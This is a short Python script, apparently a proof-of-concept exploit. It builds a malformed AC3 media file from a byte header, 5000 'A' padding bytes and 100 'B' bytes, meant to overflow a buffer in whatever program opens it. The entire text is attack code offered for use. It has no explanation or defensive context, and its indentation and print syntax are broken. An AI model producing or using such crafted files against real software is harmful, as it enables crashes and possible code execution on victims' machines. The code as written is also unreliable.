print
buffer=(
"\x0B\x77\x3E\x68\x50\x40\x43\xE1\x06\xA0\xB9"
"\x65\xFF\x3A\xBE\x7C\xF9\xF3\xE7\xCF\x9F\x3E"
)
junk = "\x41" * 5000
bob = "\x42" * 100
exploit = buffer+ junk + bob
try:
rst= open("exploit.ac3",'w')
rst.write(exploit)
rst.close()
print("\nExploit file created!\n")
except:
print "Error"